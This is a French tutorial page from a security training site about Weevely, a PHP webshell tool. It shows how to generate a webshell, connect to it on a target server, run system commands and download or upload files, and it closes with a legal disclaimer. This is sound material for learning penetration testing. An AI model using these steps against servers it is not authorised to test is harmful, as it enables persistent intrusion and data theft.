Weevely est un outil de post-exploitation pour les tests de pénétration et les audits de sécurité. Il est conçu pour générer des webshells PHP qui permettent aux utilisateurs d'interagir avec des serveurs web compromis. Weevely offre une interface en ligne de commande intuitive pour exécuter des commandes, naviguer dans le système de fichiers, et effectuer diverses actions sur le serveur cible.

Fonctionnalités Principales de Weevely

  • Génération de Webshells : Génère des webshells PHP pour obtenir un accès persistant au serveur cible.
  • Interface en Ligne de Commande : Offre une interface en ligne de commande pour interagir avec le serveur cible.
  • Navigation dans le Système de Fichiers : Permet de naviguer dans le système de fichiers du serveur cible.
  • Exécution de Commandes : Permet d'exécuter des commandes système sur le serveur cible.
  • Téléchargement et Téléversement de Fichiers : Permet de télécharger et de téléverser des fichiers sur le serveur cible.
  • Modules : Offre divers modules pour des tâches spécifiques, comme la collecte d'informations, la gestion des utilisateurs, etc.

Installation de Weevely

Weevely est principalement disponible sur les systèmes Linux. Vous pouvez l'installer en utilisant le gestionnaire de paquets de votre distribution ou en téléchargeant le script directement depuis GitHub.

Téléchargement depuis GitHub

Vous pouvez télécharger Weevely directement depuis GitHub et l'installer :

git clone https://github.com/epinna/weevely3.git
cd weevely3
sudo python setup.py install

Utilisation de Base

1. Générer un Webshell

Pour générer un webshell PHP :

weevely generate password

Cela générera un fichier PHP que vous pouvez téléverser sur le serveur cible.

2. Connecter au Webshell

Pour se connecter au webshell téléversé :

weevely http://example.com/weevely.php password

3. Naviguer dans le Système de Fichiers

Pour naviguer dans le système de fichiers du serveur cible :

:cd /path/to/directory :ls

4. Exécuter des Commandes

Pour exécuter des commandes système sur le serveur cible :

:system whoami

5. Télécharger un Fichier

Pour télécharger un fichier depuis le serveur cible :

:download /path/to/file

6. Téléverser un Fichier

Pour téléverser un fichier sur le serveur cible :

:upload /local/path/to/file /remote/path/to/file

Exemples de Ligne de Commande

Générer un Webshell et Se Connecter

Pour générer un webshell, le téléverser sur le serveur cible, et se connecter :

weevely generate password
# Téléverser le fichier généré sur le serveur cible
weevely http://example.com/weevely.php password

Naviguer dans le Système de Fichiers et Exécuter des Commandes

Pour naviguer dans le système de fichiers et exécuter des commandes système :

weevely http://example.com/weevely.php password
:cd /var/www
:ls
:system whoami

Télécharger et Téléverser des Fichiers

Pour télécharger et téléverser des fichiers sur le serveur cible :

weevely http://example.com/weevely.php password
:download /var/www/index.php
:upload /local/path/to/file /var/www/file

Conclusion

Weevely est un outil puissant et flexible pour la post-exploitation dans les tests de pénétration et les audits de sécurité. Il permet de générer des webshells PHP pour obtenir un accès persistant aux serveurs web compromis et offre une interface en ligne de commande intuitive pour interagir avec le serveur cible. Pour les débutants, il est recommandé de commencer par les fonctionnalités de base comme la génération de webshells et la navigation dans le système de fichiers, puis de progresser vers des fonctionnalités plus avancées comme l'exécution de commandes et le téléchargement/téléversement de fichiers.

N'oubliez pas de consulter la documentation officielle de Weevely pour des informations plus détaillées et des tutoriels supplémentaires. Vous pouvez également explorer les options supplémentaires et les fonctionnalités avancées pour tirer le meilleur parti de cet outil.

Liens :

https://www.kali.org/tools/weevely/

https://github.com/epinna/weevely3

https://korben.info/shell-php.html

https://securityonline.info/weevely-tutorial-php-webshell/

Youtube :


Mise en garde concernant l'utilisation des outils de cybersécurité

L'utilisation des outils de cybersécurité présentés sur ce site est soumise à des considérations légales et éthiques importantes. Avant d'utiliser ces outils, nous vous encourageons à prendre en compte les points suivants :

- Cadre légal : L'utilisation de certains outils de cybersécurité peut être réglementée par la loi dans votre pays ou région. Il est de votre responsabilité de vous informer sur les lois en vigueur concernant la cybersécurité, la protection des données et la vie privée. L'utilisation non autorisée de ces outils peut entraîner des poursuites judiciaires et des sanctions pénales.

- Consentement : Assurez-vous d'obtenir le consentement explicite des parties concernées avant d'utiliser des outils qui pourraient intercepter, surveiller ou analyser des données. Le respect de la vie privée des individus est primordial.

- Utilisation éthique : Les outils de cybersécurité doivent être utilisés de manière éthique et responsable. Ils ne doivent pas être employés à des fins malveillantes, telles que le piratage, le vol de données ou toute autre activité illégale.

- Responsabilité : En utilisant ces outils, vous reconnaissez que vous le faites à vos propres risques. Nous ne saurions être tenus responsables des conséquences résultant de l'utilisation de ces outils, y compris, mais sans s'y limiter, les dommages matériels, les pertes de données ou les poursuites judiciaires.

- Formation et expertise : Il est recommandé de suivre une formation adéquate et de posséder les compétences nécessaires avant d'utiliser des outils de cybersécurité. Une mauvaise utilisation peut entraîner des résultats indésirables et des risques pour la sécurité.

En utilisant ce site et les outils qui y sont présentés, vous acceptez de respecter ces conditions et de vous conformer à toutes les lois applicables.

Formateur

Bertrand LECLERCQ

Consultant DevSecOps & Data Engineer


Avec 25 ans d'expérience dans le développement logiciel et une certification en Data Engineering de l'École des Mines Paris - PSL, je suis passionné par la cybersécurité, le big data et le DevOps. J'aime partager mes connaissances et aider la communauté à renforcer sa posture de sécurité.

J'ai créé une base de vulnérabilités librement accessible et je me forme en continu sur des plateformes comme TryHackMe. Mon objectif ? Démocratiser la cybersécurité et permettre à chacun de mieux comprendre les enjeux.

J'ai une solide expertise dans la conception et le déploiement de solutions sécurisées, ainsi qu'une expérience éprouvée dans la gestion de projets complexes. Maîtrisant un large éventail de technologies (Python, Go, Java, Docker, Kubernetes, etc.), je suis convaincu que la sécurité doit être intégrée dès le début du cycle de développement.

Le projet NoHackMe vous permet d'effectuer une veille Cyber, vous permet de découvrir le monde de la Cybersécurité ainsi qu'une section formation Cyber

Soutenez No Hack Me sur Tipeee